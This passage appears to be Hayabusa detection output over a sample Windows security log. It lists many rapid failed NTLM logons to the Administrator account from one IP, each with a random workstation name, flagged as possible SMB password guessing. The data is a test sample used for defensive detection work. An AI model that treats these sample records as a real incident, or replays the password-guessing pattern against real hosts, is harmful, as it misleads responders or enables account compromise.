NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: 